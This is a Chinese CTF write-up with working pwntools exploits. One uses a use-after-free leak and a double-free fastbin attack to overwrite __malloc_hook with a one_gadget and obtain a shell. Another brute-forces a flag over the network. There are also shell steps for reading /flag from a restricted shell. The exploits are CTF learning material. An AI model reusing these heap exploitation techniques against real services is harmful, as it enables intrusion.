1.findyourself

  • 这题我也不知道是啥,好像是什么proc shell反正没听过,先记录下来再说。
  • Step1:ls -l /proc/self/cwd
  • Step2: $0
  • Step3: exec 1>&0
  • Step4: cat /flag

2.Roc826s_Note

  • 这题考察的是heap题,本身难度不大,题目本身有个UAF漏洞,可以用来泄漏地址,然后可以用double free进行fastbin attack。exp直接放上。
#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='amd64', os='linux', timeout=1)
#context.log_level='debug'
# Target selection: the remote challenge service when the Q arg is given, else the local binary.
io = remote('47.103.214.163', 21002) if args.Q else process('./Roc826')

def add(size, content):
	"""Menu choice 1: after the 'exit\\n:' prompt, send the size and then the content."""
	io.recvuntil('exit\n:')
	io.sendline('1')
	io.recvuntil('size?\n')
	io.sendline(size)
	io.recvuntil('content:')
	io.sendline(content)
def dele(index):
	"""Menu choice 2: after the 'exit\\n:' prompt, send the index to delete."""
	io.recvuntil('exit\n:')
	io.sendline('2')
	io.recvuntil('index?\n')
	io.sendline(index)
def show(index):
	"""Menu choice 3: after the 'exit\\n:' prompt, send the index to display."""
	io.recvuntil('exit\n:')
	io.sendline('3')
	io.recvuntil('index?\n')
	io.sendline(index)
def leak():
	"""Read an address back from a freed entry and return it minus 88.

	Requests two entries of size '144', deletes the first and then shows it;
	per the write-up the show still works after the delete (the UAF). The
	first 6 bytes printed after ':' are taken as a pointer. The caller uses
	the returned value to compute libc_base.
	"""
	io.recvuntil('exit\n:')
	add('144','aaaaa')#0
	add('144','wwww')#1
	dele('0')
	show('0')  # entry 0 is already deleted here
	io.recvuntil(':')
	# 6-byte pointer zero-padded to 8 bytes; the -88 adjustment is the write-up's
	# constant for this challenge's libc — confirm against the target build
	main_arena_leak=u64(io.recv(6).ljust(8,'\x00'))-88
	log.success('main_arena_leak==>{}'.format(hex(main_arena_leak)))
	dele('1')
	return main_arena_leak
def pwn(malloc_hook,payload):
	"""Second stage: free entry 2 twice among size-'96' entries, then hand over the session.

	Args:
		malloc_hook: libc-relative address computed by the caller.
			NOTE(review): unused in this body; the function reads the
			module-level ``fake_chunk`` assigned in __main__ instead.
		payload: content of the last allocation (built in __main__).

	Ends in io.interactive(), so it does not return normally.
	"""
	io.recvuntil('exit\n:')
	add('96','w')#2
	add('96','x')#3
	dele('2')
	dele('3')
	dele('2')  # index 2 deleted a second time (the double free the write-up mentions)
	#7ff02b0c7000
	add('96',p64(fake_chunk))#2  # fake_chunk is a global from __main__, not a parameter
	add('96','h')#3
	add('96','')#2
	add('96',payload)
	# Start one more allocation: only the size is sent before going interactive
	io.recvuntil('exit\n:')
	io.sendline('1')
	io.sendlineafter('size?\n','20')
	io.interactive()
if __name__ == '__main__':
	# All offsets below are the write-up's constants for the challenge's libc build.
	main_arena_leak = leak()
	libc_base = main_arena_leak - 0x3C4B20
	log.success('libc_base==>{}'.format(hex(libc_base)))
	one_gadget = libc_base + 0xf1147
	malloc_hook = libc_base + 0x3C4B10
	# pwn() reads fake_chunk as a module-level global
	fake_chunk = malloc_hook - 0x23
	payload = 'a' * 19 + p64(one_gadget)
	#gdb.attach(io,'b add')
	#pause()
	pwn(malloc_hook, payload)

3.Another_Heaven

  • 这题一开始我只注意到v5那边任意地址写1byte,然后我的思路是重写循环从而进行任意地址写,然后打开gdb vmmap一下就傻了,text段不可写,然后得到大佬的指点,最后用了爆破。晕~ 我这个爆破脚本可能写得不好,但是基本能跑出来,就是耗点时间,有兴趣的小伙伴可以加多线程来跑。
#!/usr/bin/python
#coding:utf-8

from pwn import *
import os

context.update(arch='amd64', os='linux', timeout=1)
#context.log_level='debug'

# flag_addr is the base address passed to write(); flag accumulates the characters guess() recovers.
flag_addr = 0x602160
flag = ''

	
def account(io, account):
	"""Wait for the 'Account:' prompt on *io*, then send *account* as one line."""
	io.recvuntil('Account:')
	io.sendline(account)
	 
def write(io, addr):
	"""After the 'Annevi!' banner line, send *addr* in decimal as a line, then a single NUL byte."""
	io.sendlineafter('Annevi!\n', str(addr))
	io.send('\x00')
	
def guess(length):
	"""Recover characters at positions 41 up to *length*-1, one position at a time.

	For each position, every candidate in ``key`` gets a fresh connection:
	the known prefix plus the candidate is sent as the password and the
	candidate is kept when the reply line contains 'Welcome!'. Progress is
	stored in the module-level ``flag`` and printed at the end.
	"""
	key='}?!_=|:"><+_)(*&^%$#@![];,./qwertyuiopsdfjklzxcvbnm1234567890QWERTYUIOPASDFGHJKLZXCVBNM'
	# NOTE(review): 41 is presumably the count of characters already known — confirm
	for i in range(41,length):
		try:
			for j in key:
					global flag
					os.system('clear')
					io=remote('47.103.214.163',21001)
					#io=process('./Another_Heaven')
					write(io,flag_addr+i+1)
					account(io,'E99p1ant')
					io.sendlineafter('Password:\n',flag+j)
					recv=io.recvline()
					if 'Welcome!' in recv:
						flag+=j
						log.success('The flag is :{}'.format(flag))
						break
					# No match: close and try the next candidate. If no candidate
					# matches at all, the outer loop still advances with flag unchanged.
					io.close()
		except:
			# NOTE(review): bare except also swallows KeyboardInterrupt; and if remote()
			# raised before io was bound, io.close() here raises NameError instead.
			print 'except:'+str(i)
			io.close()
			exit(0)
	print flag
					
	
if __name__ == '__main__':
	# 48 is the write-up's total length bound for the brute force
	guess(length=48)

4.形而上的坏死